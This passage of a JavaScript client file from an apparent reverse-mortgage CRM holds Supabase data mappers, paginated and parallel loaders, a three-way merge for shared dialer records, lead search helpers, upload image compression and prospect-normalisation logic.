      {id:"insurance",on:true,label:"Homeowner's Insurance — Declarations Page",desc:"The declarations (“dec”) page of your current homeowner's insurance policy."},
      {id:"income",on:!streamlined,label:"Income Verification — 2025 1099 & 2026 Benefit Statement",desc:"Your 2025 SSA-1099 and 2026 Benefit Statement. You can download both from your free “my Social Security” account.",link:SSA_ACCOUNT_URL,linkLabel:"Get these from SSA.gov"},
      {id:"counseling",on:true,label:"Signed Counseling Certificate",desc:"Your HUD-approved counseling certificate, signed by you and the counselor."},
      {id:"coborrower_id",on:false,label:"Co-Borrower Photo ID (if applicable)",desc:"Only needed if there is a co-borrower or non-borrowing spouse on the loan."}
    ]
  };
}
// Resolve the editable template + custom items into the flat {title,items}
// sections shape shared by the email endpoint and the portal display.
function buildDocSections(dr,customItems){
  var sections=[];
  if(dr.application&&dr.application.on){
    sections.push({title:"Application Docs",items:[{label:dr.application.label,desc:dr.application.desc,link:(dr.application.link||"").trim(),linkLabel:dr.application.linkLabel}]});
  }
  var sup=(dr.supporting||[]).filter(function(s){return s.on;}).map(function(s){return{label:s.label,desc:s.desc,link:s.link||"",linkLabel:s.linkLabel||""};});
  (customItems||[]).forEach(function(c){if(c&&c.trim())sup.push({label:c.trim(),desc:"",link:"",linkLabel:""});});
  if(sup.length)sections.push({title:"Supporting Docs",items:sup});
  return sections;
}

// (Borrower code comparison moved server-side to /api/borrower/login — the
// client no longer does timing-safe compares because it never sees the
// stored hashes in Phase 1B. The earlier browser-side helper lived here.)
// Slim = the original schema.sql columns. Full adds delivery/error (see
// supabase/2026-09-10-expense-notes-and-receipt-storage.sql); the save falls
// back to slim if that migration hasn't been run. Without these two columns
// every SMS reverted to "unknown" after reload — a failed RingCentral send
// looked identical to a delivered one.
function smsToDbSlim(s){return{id:s.id,to_number:s.to,message:s.message,type:s.type,date:s.date,time:s.time,timestamp_str:s.timestamp};}
function smsToDb(s){var r=smsToDbSlim(s);r.delivery=s.delivery||null;r.error=s.error||null;return r;}
function smsFromDb(r){return{id:r.id,to:r.to_number,message:r.message,type:r.type,date:r.date,time:r.time,timestamp:r.timestamp_str,delivery:r.delivery||null,error:r.error||null};}
function leadFromDb(l){return Object.assign({},l,{doNotContact:l.do_not_contact,follow_up_date:l.follow_up_date||null,list_source:l.list_source||l.source||"",original_lender:l.original_lender||"",mailings:l.mailings||[],history:l.history||[],tags:l.tags||[]});}
// `source` keeps its own value ("Web Intake", "Imported"…) — it used to be
// overwritten with list_source on every save of the row.
function leadToDb(l){return{id:l.id,name:l.name||"",phone:l.phone||"",email:l.email||"",address:l.address||"",city:l.city||"",state:l.state||"",zip:l.zip||"",home_value:l.home_value||0,loan_balance:l.loan_balance||0,loan_type:l.loan_type||"",source:l.source||l.list_source||"",original_lender:l.original_lender||l.lender||"",close_year:l.close_year||"",list_source:l.list_source||"",status:l.status||"New",notes:l.notes||"",follow_up_date:l.follow_up_date||null,mailings:l.mailings||[],history:l.history||[],do_not_contact:!!l.doNotContact,responded:!!l.responded,responded_at:l.responded_at||null,response_method:l.response_method||null,revenue:l.revenue?String(l.revenue):null,temp:l.temp||null,touch_number:l.touch_number?String(l.touch_number):null,tags:l.tags||[],dm_campaign:l.dm_campaign||null,campaign:l.campaign||null,converted_loan_id:l.converted_loan_id||null,
  // Real columns that the New Call console writes into state but this mapper
  // used to drop — the rate and origination date captured on a live call were
  // lost at the next reload.
  rate:l.rate==null?"":String(l.rate),origination_date:l.origination_date||l.origDate||"",updated_at:l.updated_at||new Date().toISOString()};}

// Paginated loader — Supabase caps a single .select() response at 1000 rows,
// so we fetch the table in 1000-row .range() pages. Used by both the initial
// load and the 30-second admin poll; without this, rows beyond the first 1000
// disappear from `mktgLeads` after the first poll.
//
// The first request carries {count:'exact'} so we know the total up front;
// the remaining pages then download IN PARALLEL (6 at a time). The old
// serial walk took 70+ round trips for the 70K-row marketing database —
// minutes of wall-clock on a normal connection. Every request is ordered by
// id: parallel .range() pages without a stable order can silently duplicate
// or drop rows.
//
// onProgress (optional) is called with (rowsLoaded, totalRows) as pages land
// so the UI can show real progress on the big lead download.
// orFilter (optional): a PostgREST or() filter, e.g. WORKING_LEADS_FILTER, so a
// caller can page through a slice of a table instead of all of it.
async function loadAllRows(table,columns,onProgress,orFilter){
  var pageSize=1000;var sel=columns||'*';
  var q=function(query){return orFilter?query.or(orFilter):query;};
  var report=function(loaded,total){if(typeof onProgress==="function"){try{onProgress(loaded,total);}catch(e){}}};
  var first=await q(supabase.from(table).select(sel,{count:'exact'})).order('id',{ascending:true}).range(0,pageSize-1);
  if(first.error){console.warn("Load failed for "+table+":",first.error.message);return{data:[],error:first.error};}
  var firstRows=first.data||[];
  var total=(typeof first.count==="number"&&first.count>=firstRows.length)?first.count:firstRows.length;
  report(firstRows.length,total);
  if(firstRows.length<pageSize)return{data:firstRows,error:null};
  // Remaining page offsets, fetched in parallel batches.
  var offsets=[];
  for(var start=pageSize;start<total;start+=pageSize)offsets.push(start);
  var pages=new Array(offsets.length);
  var firstError=null;var loaded=firstRows.length;
  var CONCURRENCY=6;
  // Defined ONCE (not inside the loop) so it can't capture a mutating loop
  // index — `slot` is passed in explicitly. Each call resolves a single page
  // into pages[slot]; the loop below awaits a barrier per batch.
  var fetchPage=function(off,slot){
    return q(supabase.from(table).select(sel)).order('id',{ascending:true}).range(off,off+pageSize-1)
      .then(function(res){
        if(res.error){if(!firstError)firstError=res.error;return;}
        pages[slot]=res.data||[];
        loaded+=pages[slot].length;
        report(loaded,total);
      });
  };
  for(var i=0;i<offsets.length&&!firstError;i+=CONCURRENCY){
    var batch=[];
    for(var j=i;j<offsets.length&&j<i+CONCURRENCY;j++)batch.push(fetchPage(offsets[j],j));
    await Promise.all(batch);
    // firstError is re-checked by the for-condition — stop hammering a failing table.
  }
  if(firstError){
    console.warn("Load failed for "+table+":",firstError.message);
    // Partial result — callers treat any error as "retry, don't trust this".
    var partial=firstRows;
    for(var p=0;p<pages.length;p++){if(!pages[p])break;partial=partial.concat(pages[p]);}
    return{data:partial,error:firstError};
  }
  var all=firstRows;
  for(var k=0;k<pages.length;k++)all=all.concat(pages[k]||[]);
  return{data:all,error:null};
}

// ── Outbound contacts (skip-traced phones/emails) ──
// Kept in their own table (supabase/2026-09-30-outbound-contacts.sql) so they
// never auto-fill a lead's phone/email. `missing:true` = migration not run yet.
var isMissingTable=function(err){return !!err&&/PGRST205|42P01|does not exist|Could not find the table/i.test((err.code||"")+" "+(err.message||""));};
async function loadOutbound(){
  var r=await loadAllRows("outbound_contacts");
  if(r.error)return isMissingTable(r.error)?{data:[],missing:true,error:null}:{data:[],missing:false,error:r.error};
  return{data:r.data||[],missing:false,error:null};
}
// Contacts whose skip-traced numbers include this phone (any format in).
async function outboundByPhone(phone){
  var d=String(phone||"").replace(/\D/g,"").slice(-10);
  if(d.length!==10)return[];
  var r=await supabase.from("outbound_contacts").select("*").contains("phone_digits",[d]).limit(5);
  return r.error?[]:(r.data||[]);
}
async function updateOutbound(id,patch){
  return supabase.from("outbound_contacts").update(Object.assign({},patch,{updated_at:new Date().toISOString()})).eq("id",id);
}
// ── Outbound rows are shared by Reece and Max: read → merge → write ──
// A plain update from this tab's copy replaced the whole results array and the
// notes text, so two people dialing the same list erased each other's call
// results and notes. A sync is a THREE-WAY merge instead:
//   local  = this tab's row now, base = the last copy this tab got from (or
//   wrote to) the server, server = a fresh read.
// Results merge per entry (key = when + which number): what this tab added or
// edited (a note, a follow-up, closing one) wins, what the other side added is
// kept, and an entry either side removed (Undo) stays removed. Note lines merge
// the same way. call_count applies this tab's change to the server's count.
// The write is conditional on the row not having moved since the read (its
// updated_at), and retries with a fresh read when it has.
function _obResKey(x){return x?String(x.at||"")+"|"+String(x.n||""):"";}
function _plain(v){return v!==null&&typeof v==="object"&&!Array.isArray(v);}
function _jeq(a,b){return a===b||JSON.stringify(a)===JSON.stringify(b);}
function _mergeField(a,b,s){if(_jeq(a,b))return s;if(_jeq(s,b))return a;return a;}
function _mergeEntry(a,b,s){
  if(!_plain(a)||!_plain(s))return a;
  var bo=_plain(b)?b:{};var out={};var ks={};
  [a,bo,s].forEach(function(o){Object.keys(o).forEach(function(k){ks[k]=1;});});
  Object.keys(ks).forEach(function(k){var v=_mergeField(a[k],bo[k],s[k]);if(v!==undefined)out[k]=v;});
  return out;
}
function mergeOutboundResults(a,b,s){
  a=Array.isArray(a)?a:[];s=Array.isArray(s)?s:[];
  var hasBase=Array.isArray(b);
  var bm=new Map(),sm=new Map(),am=new Set();
  (hasBase?b:[]).forEach(function(x){bm.set(_obResKey(x),x);});
  s.forEach(function(x){sm.set(_obResKey(x),x);});
  a.forEach(function(x){am.add(_obResKey(x));});
  var out=[];var seen=new Set();
  a.forEach(function(x){
    var k=_obResKey(x);
    if(hasBase&&bm.has(k)&&!sm.has(k))return;          // the other side removed it (Undo)
    seen.add(k);
    out.push(bm.has(k)&&sm.has(k)?_mergeEntry(x,bm.get(k),sm.get(k)):x);
  });
  s.forEach(function(x){
    var k=_obResKey(x);
    if(seen.has(k)||am.has(k))return;
    if(hasBase&&bm.has(k))return;                       // this tab removed it (Undo)
    seen.add(k);out.push(x);
  });
  return out.map(function(x,i){return{x:x,i:i};}).sort(function(p,q){var A=String((p.x&&p.x.at)||""),B=String((q.x&&q.x.at)||"");return A<B?-1:A>B?1:p.i-q.i;}).map(function(o){return o.x;});
}
function mergeOutboundNotes(a,b,s){
  a=String(a||"");s=String(s||"");
  if(b!=null){b=String(b);if(a===b)return s;if(s===b)return a;}
  var la=a.split("\n").filter(Boolean),ls=s.split("\n").filter(Boolean);
  var lb=new Set(b!=null?String(b).split("\n"):[]),inA=new Set(la),inS=new Set(ls);
  var out=la.filter(function(l){return!(b!=null&&lb.has(l)&&!inS.has(l));});
  ls.forEach(function(l){if(!inA.has(l)&&!(b!=null&&lb.has(l)))out.push(l);});
  return out.join("\n");
}
// The merged values of the columns the dialer writes. status / last_result
// are derived from the merged results by the caller (finalize).
function mergeOutboundRow(local,base,server){
  local=local||{};server=server||{};
  var results=mergeOutboundResults(local.results,base?base.results:null,server.results);
  var notes=mergeOutboundNotes(local.notes,base?base.notes:null,server.notes);
  var lc=Number(local.call_count)||0,sc=Number(server.call_count)||0;
  var call_count=base?Math.max(0,sc+(lc-(Number(base.call_count)||0))):Math.max(lc,sc);
  var last=null;results.forEach(function(x){if(x&&x.at&&(!last||String(x.at)>String(last.at)))last=x;});
  var lastAt=last?last.at:null;
  // No results left → whichever side still names a time (an imported row).
  if(!lastAt){var la=local.last_called_at||null,sa=server.last_called_at||null;lastAt=base&&_jeq(la,base.last_called_at)?sa:la;}
  return{results:results,notes:notes,call_count:call_count,last_called_at:lastAt||null,last_result:last?last.result:""};
}
async function syncOutboundRow(id,local,base,finalize){
  for(var attempt=0;attempt<4;attempt++){
    var rd=await supabase.from("outbound_contacts").select("*").eq("id",id);
    if(rd.error)return{error:rd.error};
    var srv=Array.isArray(rd.data)?rd.data[0]:null;
    if(!srv)return{error:{message:"contact "+id+" couldn't be read (signed out?)"}};
    var merged=Object.assign({},srv,mergeOutboundRow(local,base,srv));
    if(typeof finalize==="function")merged=finalize(merged)||merged;
    var now=new Date().toISOString();
    var patch={results:merged.results,notes:merged.notes,call_count:merged.call_count,last_called_at:merged.last_called_at,last_result:merged.last_result,status:merged.status,updated_at:now};
    var q=supabase.from("outbound_contacts").update(patch).eq("id",id);
    q=srv.updated_at?q.eq("updated_at",srv.updated_at):q.is("updated_at",null);
    var w=await q.select("id");
    if(w.error)return{error:w.error};
    if(Array.isArray(w.data)&&w.data.length){merged.updated_at=now;return{data:merged,error:null};}
    // 0 rows: someone wrote it between the read and the write → re-read and
    // merge again. (A signed-out session reads nothing above and stops there.)
  }
  return{error:{message:"contact "+id+" kept changing — try again"}};
}
// Rows changed since `sinceIso` (another user's results), oldest first.
async function loadOutboundSince(sinceIso){
  var r=await supabase.from("outbound_contacts").select("*").gte("updated_at",sinceIso).order("updated_at",{ascending:true}).limit(1000);
  return r.error?{data:[],error:r.error}:{data:r.data||[],error:null};
}
async function loadOutboundByIds(ids){
  if(!ids||!ids.length)return{data:[],error:null};
  var r=await supabase.from("outbound_contacts").select("*").in("id",ids);
  return r.error?{data:[],error:r.error}:{data:r.data||[],error:null};
}
// The skip-traced contact rows Outbound holds for ONE lead (oc_lead_idx) —
// read for the lead card's "On file" COUNT (convoGuide.outboundCounts). Only
// the fields a count needs; the card never prints a number or an email.
async function outboundByLead(leadId){
  if(!leadId||!supabase)return{data:[],error:{message:"database not configured"}};
  var r=await supabase.from("outbound_contacts").select("id,phones,phone_digits,emails,litigator").eq("lead_id",leadId).limit(25);
  if(r.error)return isMissingTable(r.error)?{data:[],missing:true,error:null}:{data:[],error:r.error};
  return{data:r.data||[],error:null};
}
// Leads carrying a handwritten letter logged in New Call ("Confirm
// Handwritten Letter" writes campaign "Handwritten Letter"). Server-side
// jsonb contains query — never loads the full lead table.
// Every candidate query is PAGED and ordered (loadAllRows). The old single
// .limit(10000) query was silently capped at 1000 rows by the server with no
// ORDER BY: ~1,500 mailhouse rows also carry method "Handwritten", so each
// load returned a different random 1000 and letters vanished from the view.
// 1) Ask for the campaign itself (a handful of rows). The old comment blamed
//    "+"-encoded spaces for an empty 404 — that was a bad URL in a test env;
//    the campaign filter returns every letter. 2) If it errors or comes back
//    empty, fall back to the one-word method filter and keep the "Handwritten
//    Letter" rows client-side. 3) Fetch the full rows by id.
var HANDWRITTEN_CAMPAIGN="Handwritten Letter";
async function loadHandwrittenLetterLeads(){
  if(!supabase)return{data:[],error:{message:"database not configured"}};
  var c=await loadAllRows("marketing_leads","id,mailings",null,'mailings.cs.[{"campaign":"'+HANDWRITTEN_CAMPAIGN+'"}]');
  if(c.error||!c.data||!c.data.length){
    var m=await loadAllRows("marketing_leads","id,mailings",null,'mailings.cs.[{"method":"Handwritten"}]');
    if(m.error)return{data:[],error:m.error};
    c=m;
  }
  var seen=Object.create(null);
  var ids=(c.data||[]).filter(function(r){if(!r||seen[r.id])return false;seen[r.id]=1;return (r.mailings||[]).some(function(x){return x&&x.campaign===HANDWRITTEN_CAMPAIGN;});}).map(function(r){return r.id;});
  if(!ids.length)return{data:[],error:null};
  var out=[];
  for(var i=0;i<ids.length;i+=150){
    var r=await supabase.from("marketing_leads")
      .select("*")
      .in("id",ids.slice(i,i+150));
    if(r.error)return{data:[],error:r.error};
    out=out.concat(r.data||[]);
  }
  return{data:out.map(leadFromDb),error:null};
}
async function fetchLeadById(id){
  if(!id)return null;
  var r=await supabase.from("marketing_leads").select("*").eq("id",id).limit(1);
  return r.data&&r.data[0]?leadFromDb(r.data[0]):null;
}

// ── Server-side lead search ──
// The never-mailed leads are not in memory, so Find falls back to asking the
// database. Matches name, street address or phone digits; at most `limit`
// rows, already mapped with leadFromDb. PostgREST or() syntax treats commas and
// parentheses as separators, so they are stripped from the query first.
async function searchLeadsRemote(query,limit){
  var q=String(query||"").replace(/[(),*%."]/g," ").replace(/\s+/g," ").trim();
  if(q.length<3)return{data:[],error:null};
  var digits=q.replace(/[^0-9]/g,"");
  var parts=["name.ilike.*"+q+"*","address.ilike.*"+q+"*"];
  if(digits.length>=7)parts.push("phone.ilike.*"+digits.slice(-10)+"*");
  // Phones are stored as typed ("602-555-0100", "(602) 555-0100"), so a
  // bare-digit pattern alone misses them.
  if(digits.length===10){var d10=digits;parts.push("phone.ilike.*"+d10.slice(0,3)+"-"+d10.slice(3,6)+"-"+d10.slice(6)+"*");parts.push("phone.ilike.*"+d10.slice(3,6)+"-"+d10.slice(6)+"*");}
  var r=await supabase.from("marketing_leads").select("*").or(parts.join(",")).limit(limit||25);
  if(r.error)return{data:[],error:r.error};
  return{data:(r.data||[]).map(leadFromDb),error:null};
}

// ── Server-side CLOSE-match lead search ──
// Find asks this only when the exact searches (in memory + searchLeadsRemote)
// came back thin: the database function search_leads_fuzzy
// (supabase/2026-10-01-fuzzy-lead-search.sql — pg_trgm word similarity on
// the name / address trigram indexes) finds near-spellings among the leads
// that aren't loaded. `params` is callSearch.fuzzyRemoteParams(): {kind:
// "address"|"name", q, house, zip}. The rows it returns are only candidates —
// the console checks each one with callSearch's own close-match rules.
// Never throws. Until that SQL has been run the function doesn't exist
// (PostgREST PGRST202 / 404): that is remembered for the rest of the session
// and the search quietly carries on without it — {missing:true}, no error.
var fuzzyLeadSearchMissing=false;
function isMissingFunction(r){
  var e=(r&&r.error)||{};
  return (r&&r.status===404)||e.code==="PGRST202"||e.code==="42883"||
    /could not find the function|function .* does not exist/i.test(String(e.message||""));
}
async function searchLeadsFuzzy(params,limit){
  var p=params||{};
  var q=String(p.q||"").replace(/\s+/g," ").trim();
  if(!supabase||fuzzyLeadSearchMissing||q.length<2)return{data:[],error:null,missing:fuzzyLeadSearchMissing};
  try{
    var r=await supabase.rpc("search_leads_fuzzy",{q:q.slice(0,120),kind:p.kind==="name"?"name":"address",
      house:p.house?String(p.house).slice(0,16):null,zip:p.zip?String(p.zip).slice(0,5):null,lim:Math.max(1,Math.min(200,limit||100))});
    if(r&&r.error){
      if(isMissingFunction(r)){fuzzyLeadSearchMissing=true;return{data:[],error:null,missing:true};}
      return{data:[],error:r.error};
    }
    return{data:((r&&r.data)||[]).map(leadFromDb),error:null};
  }catch(e){return{data:[],error:e};}
}

// ── Batched lookups for the call & email log (src/contactLog.js) ──
// Only the people the log couldn't find in memory are asked about, a few at
// a time, filtered — never the whole table (the login loads only the
// mailed / worked leads; the rest are never-mailed rows). The rows are just
// candidates: contactLog.matchPeople checks every one itself.
//   phones  10-digit strings → phone.ilike.*602*919*9034* (any format stored)
//   emails  → email.ilike."x@y.com" (case-insensitive)
//   names   [[first,last]] → name.ilike.*first*last* / *last*first*
// Never throws. → {data: leads (leadFromDb), error}
var CONTACT_LOOKUP_CONCURRENCY=3;
async function _contactPool(jobs,run,onProgress){
  var next=0,done=0;
  async function worker(){while(next<jobs.length){var j=jobs[next++];await run(j);done++;if(onProgress)try{onProgress(done,jobs.length);}catch(e){/* a view went away */}}}
  var ws=[];for(var i=0;i<Math.min(CONTACT_LOOKUP_CONCURRENCY,jobs.length);i++)ws.push(worker());
  await Promise.all(ws);
}
async function searchLeadsByContacts(q,opts){
  var o=opts||{};q=q||{};
  if(!supabase)return{data:[],error:null};
  var letters=function(s){return String(s||"").toLowerCase().replace(/[^a-z]/g,"");};
  var phones=(q.phones||[]).map(function(p){return String(p||"").replace(/\D/g,"").slice(-10);}).filter(function(d){return d.length===10;});
  var emails=(q.emails||[]).map(function(e){return String(e||"").trim().toLowerCase().replace(/[",()\\]/g,"");}).filter(function(e){return /^[^@\s]+@[^@\s]+$/.test(e);});
  var names=(q.names||[]).map(function(pr){return[letters(pr&&pr[0]),letters(pr&&pr[1])];}).filter(function(pr){return pr[0].length>=2&&pr[1].length>=2;});
  var jobs=[],i;
  for(i=0;i<phones.length;i+=8)jobs.push(phones.slice(i,i+8).map(function(d){return"phone.ilike.*"+d.slice(0,3)+"*"+d.slice(3,6)+"*"+d.slice(6)+"*";}).join(","));
  for(i=0;i<emails.length;i+=10)jobs.push(emails.slice(i,i+10).map(function(e){return'email.ilike."'+e+'"';}).join(","));
  for(i=0;i<names.length;i+=6)jobs.push(names.slice(i,i+6).map(function(pr){return"name.ilike.*"+pr[0]+"*"+pr[1]+"*,name.ilike.*"+pr[1]+"*"+pr[0]+"*";}).join(","));
  var seen=Object.create(null),out=[],err=null;
  await _contactPool(jobs,async function(or){
    try{
      var r=await supabase.from("marketing_leads").select("*").or(or).limit(o.limit||200);
      if(r&&r.error){if(!err)err=r.error;return;}
      ((r&&r.data)||[]).forEach(function(row){if(row&&row.id&&!seen[row.id]){seen[row.id]=1;out.push(leadFromDb(row));}});
    }catch(e){if(!err)err=e;}
  },o.onProgress);
  return{data:out,error:err};
}
// Skip-traced numbers (outbound_contacts.phone_digits) — they are only ever
// MATCHED against, never copied onto a lead. {missing:true} until the
// 9/30 outbound SQL has been run.
async function outboundByPhones(phones){
  if(!supabase)return{data:[],error:null,missing:false};
  var ds=(phones||[]).map(function(p){return String(p||"").replace(/\D/g,"").slice(-10);}).filter(function(d){return d.length===10;});
  var out=[],seen=Object.create(null);
  for(var i=0;i<ds.length;i+=100){
    try{
      var r=await supabase.from("outbound_contacts").select("id,lead_id,phone_digits,name,city,state").overlaps("phone_digits",ds.slice(i,i+100)).limit(1000);
      if(r&&r.error)return isMissingTable(r.error)?{data:[],error:null,missing:true}:{data:out,error:r.error,missing:false};
      ((r&&r.data)||[]).forEach(function(x){if(x&&x.id&&!seen[x.id]){seen[x.id]=1;out.push(x);}});
    }catch(e){return{data:out,error:e,missing:false};}
  }
  return{data:out,error:null,missing:false};
}
async function fetchLeadsByIds(ids){
  if(!supabase)return{data:[],error:null};
  var list=(ids||[]).filter(Boolean),out=[];
  for(var i=0;i<list.length;i+=150){
    try{
      var r=await supabase.from("marketing_leads").select("*").in("id",list.slice(i,i+150));
      if(r&&r.error)return{data:out,error:r.error};
      out=out.concat(((r&&r.data)||[]).map(leadFromDb));
    }catch(e){return{data:out,error:e};}
  }
  return{data:out,error:null};
}


// ═══════ LOGIN ═══════
// Downscale + re-encode an image data URL so a phone photo of a statement
// fits comfortably under Vercel's ~4.5MB request-body cap when it rides to
// /api/intake as base64. Flattens transparency onto white for JPEG. Resolves
// to a new data URL, or rejects if the image can't be decoded.
function compressImageDataURL(dataUrl,maxEdge,quality){
  return new Promise(function(resolve,reject){
    try{
      var img=new Image();
      img.onload=function(){
        var w=img.width,h=img.height;
        if(!w||!h){reject(new Error("bad_image"));return;}
        if(w>maxEdge||h>maxEdge){var s=maxEdge/Math.max(w,h);w=Math.round(w*s);h=Math.round(h*s);}
        var canvas=document.createElement("canvas");canvas.width=w;canvas.height=h;
        var ctx=canvas.getContext("2d");
        ctx.fillStyle="#fff";ctx.fillRect(0,0,w,h);
        ctx.drawImage(img,0,0,w,h);
        resolve(canvas.toDataURL("image/jpeg",quality));
      };
      img.onerror=function(){reject(new Error("img_load_failed"));};
      img.src=dataUrl;
    }catch(e){reject(e);}
  });
}
// Decode a base64 data URL into a Blob WITHOUT fetch(). The production CSP
// (connect-src in vercel.json) does not allow "data:" — so fetch(dataUrl)
// throws in deployed builds, which silently killed every upload that
// round-tripped file bytes through a data URL (statement files vanished
// while the UI claimed success). atob + Uint8Array is CSP-immune.
function dataUrlToBlob(dataUrl){
  var m=/^data:([^;,]+)?(;base64)?,(.*)$/.exec(String(dataUrl||""));
  if(!m)return null;
  var mime=m[1]||"application/octet-stream";
  try{
    if(m[2]){
      var bin=atob(m[3]);
      var bytes=new Uint8Array(bin.length);
      for(var i=0;i<bin.length;i++)bytes[i]=bin.charCodeAt(i);
      return new Blob([bytes],{type:mime});
    }
    return new Blob([decodeURIComponent(m[3])],{type:mime});
  }catch(e){return null;}
}
// Prepare an attached statement file for the intake POST. Images are
// compressed; PDFs/others pass through. Returns {name,type,dataUrl} to send,
// or null if it's still too large to attach inline (caller tells the visitor
// to email it instead). ~3.6MB base64 keeps the whole JSON body under the cap.
async function preparePhotoForUpload(file){
  if(!file||!file.data)return null;
  var dataUrl=file.data;
  var outType=file.type||"application/octet-stream";
  var outName=file.name||"statement";
  var isImage=(/^data:image\//.test(dataUrl))||((file.type||"").indexOf("image")===0);
  if(isImage){
    try{
      var c=await compressImageDataURL(dataUrl,1600,0.72);
      if(c&&c.length<dataUrl.length){
        dataUrl=c;outType="image/jpeg";
        outName=outName.replace(/\.[^.]+$/,"")+".jpg";
      }
    }catch(_e){/* keep the original bytes */}
  }
  if(dataUrl.length>3600000)return null;
  return {name:outName,type:outType,dataUrl:dataUrl};
}
// Default ack = 0 (epoch) so EVERY unacknowledged item is shown until the
// admin explicitly hits "Mark all seen". Historical pre-banner data is
// safely filtered out because activity_log entries written before this
// feature shipped don't carry the `epoch` field, and the only mktgLeads
// surfaced are ones tagged inbound-callback / inbound-statement (which
// were only ever created by the portal-intake API).
function readUrgentAck(){
  try{
    const v=localStorage.getItem(URGENT_ACK_KEY);
    if(!v)return 0;
    const n=parseInt(v,10);
    return isNaN(n)?0:n;
  }catch(e){return 0;}
}


// ═══════════════════════════════════════════════════════════════
// PROSPECT MODEL — one shape for "a person I am about to call"
// ═══════════════════════════════════════════════════════════════
// The CRM has always had two stores for the same human: loans (a pipeline
// file, short-form keys) and marketing_leads (the 70K-row mail database,
// snake_case). Every screen that wanted to search "leads" re-implemented the
// normalization inline, which is why the same person could look different in
// Inquiry, Calc and Marketing. These helpers give one canonical shape so the
// New Call console can search, display, edit and disposition either kind
// without caring which table it came from.

function _num(v){var n=parseFloat(String(v==null?"":v).replace(/[^0-9.-]/g,""));return isNaN(n)?0:n;}

// Extra profile detail a marketing lead has nowhere to put. marketing_leads
// has no column for "current principal limit" or "what they actually want",
// so we keep ONE replace-in-place entry inside the existing history jsonb
// array rather than requiring a schema migration for every new question.
function leadMetaFrom(hist){
  var arr=Array.isArray(hist)?hist:[];
  for(var i=arr.length-1;i>=0;i--){if(arr[i]&&arr[i].type==="profile")return arr[i].data||{};}
  return {};
}
function leadMetaSet(hist,meta){
  var arr=(Array.isArray(hist)?hist:[]).filter(function(h){return !(h&&h.type==="profile");});
  return arr.concat([{type:"profile",ts:new Date().toISOString(),data:meta||{}}]);
}

// HECM (refi of an existing reverse) vs FTR vs HS2. An explicit pick on the
// lead card's toggle (dealType) always wins — "hs2" (HomeSafe Second: a 2nd
// lien behind a forward first that stays in place) is never a reverse refi;
// otherwise any sign of an existing reverse — the old checkbox or a principal
// limit / LOC off a statement — means HECM, matching how the calculator used
// to guess.
function isReverseFrom(meta,statementData){
  if(meta&&meta.dealType==="hecm")return true;
  if(meta&&(meta.dealType==="ftr"||meta.dealType==="hs2"))return false;
  var sd=statementData||{};
  return !!((meta&&(meta.isReverse||meta.curPL||meta.curAvail))||sd.principalLimit||sd.loc);
}
// A pipeline FILE's deal type, as the lead card's toggle reads it: the
// card's explicit pick (leadMeta.dealType) wins; otherwise a HomeSafe Second
// on the file makes it "hs2" — pitched as one (deal.dealType, or the last
// scenario's dealKind), its Loan Type set to HomeSafe Second, or a live deal
// that IS one from before the deal type existed (a "HomeSafe 2nd @ …" pitch,
// a hand-entered "HomeSafe Second") — so the file opens on HS2 in New Call
// and back in the calculator. "" = nothing explicit.
function loanDealType(l){
  if(!l)return"";
  var meta=l.leadMeta||{};
  if(meta.dealType)return String(meta.dealType);
  var d=l.deal||{};
  if(d.dealType==="hs2"||l.type===HS2_LOAN_TYPE||/^HomeSafe (2nd|Second)\b/i.test(String(d.product||"")))return"hs2";
  var h=Array.isArray(l.scenarioHistory)?l.scenarioHistory:[];
  var last=h.length?h[h.length-1]:null;
  return last&&last.dealKind==="hs2"?"hs2":"";
}
function isHs2File(l){return loanDealType(l)==="hs2";}
function _digits(v){return v?String(v).replace(/[^0-9]/g,""):"";}
function prospectFromLoan(l){
  var meta=l.leadMeta||{};
  var dealType=loanDealType(l);
  return{
    kind:"loan",id:l.id,
    name:l.b||"",phone:l.ph||"",email:l.em||"",address:l.prop||"",
    dob:l.dob||"",age:loanAge(l)||0,
    homeValue:l.hv||0,mortgageBalance:l.mb||0,
    curRate:meta.curRate||"",lender:meta.lender||"",origDate:meta.origDate||"",
    curPL:meta.curPL||_digits(l.statementData&&l.statementData.principalLimit),curAvail:meta.curAvail||_digits(l.statementData&&l.statementData.loc),estCC:meta.estCC||"",dealType:dealType,goal:meta.goal||"",
    existingLoan:meta.existingLoan||"",
    isReverse:isReverseFrom(Object.assign({},meta,{dealType:dealType}),l.statementData),condo:!!l.condo,
    loanType:l.type||"HECM",source:l.src||"",dmCampaign:l.dmCampaign||"",
    stage:l.stage||"",statusLabel:l.stage||"",
    notes:l.leadNotes||"",
    followUpDate:l.followUpDate||"",followUpNote:l.followUpNote||"",
    contactLog:l.contactLog||[],quoteLog:l.quoteLog||[],
    lastContactAt:l.lastContactAt||null,
    falloutReason:l.falloutReason||null,
    archived:!!l.archived,
    raw:l,
  };
}
// ── Recorded lien vs. balance ──
// On reverse-mortgage list leads (HECM / proprietary refi) the list's "Loan
// Balance" is the amount the lien was RECORDED for — HECMs record at 150% of
// the max claim — not what the borrower owes; it often exceeds the home
// value. It stays in loan_balance as reference ("lien"); the real balance is
// whatever Reece types (off the statement), kept in profile meta curBalance.
// Never estimate a balance from the lien.
//
// A mail-list row whose loan_type is "HECM" is a recorded reverse lien too,
// even when the list's product class says refi_forward_loan (89 prod rows at
// exactly 1.5 × the 2023/2024 FHA limit). That rule applies ONLY to list rows
// (a class:/sl: tag): New Call stamps loan_type "HECM" on every call-in lead
// it creates, and there loan_balance is the real balance Reece typed.
function isListLead(m){return((m&&m.tags)||[]).some(function(x){return /^(class|sl):/.test(String(x||""));});}
function hasRecordedLien(m){
  if(!m)return false;
  var t=m.tags||[];var lt=m.loan_type||"";
  return t.indexOf("class:refi_hecm")>=0||t.indexOf("class:refi_prop")>=0||/reverse/i.test(lt)||(/\bhecm\b/i.test(lt)&&isListLead(m));
}
// The lien was recorded on a HECM (150% of the max claim) — drives the
// "original max claim" line. Proprietary liens don't follow that rule.
function lienIsHecm(m){
  if(!m)return false;
  var t=m.tags||[];
  return t.indexOf("class:refi_hecm")>=0||(t.indexOf("class:refi_prop")<0&&/\bhecm\b/i.test(m.loan_type||"")&&hasRecordedLien(m));
}
function leadBalance(m){
  if(!m)return 0;
  return hasRecordedLien(m)?_num(leadMetaFrom(m.history).curBalance):_num(m.loan_balance);
}
function prospectFromLead(m){
  var meta=leadMetaFrom(m.history);
  var addr=[m.address,m.city,m.state].filter(Boolean).join(", ")+(m.zip?" "+m.zip:"");
  return{
    kind:"lead",id:m.id,
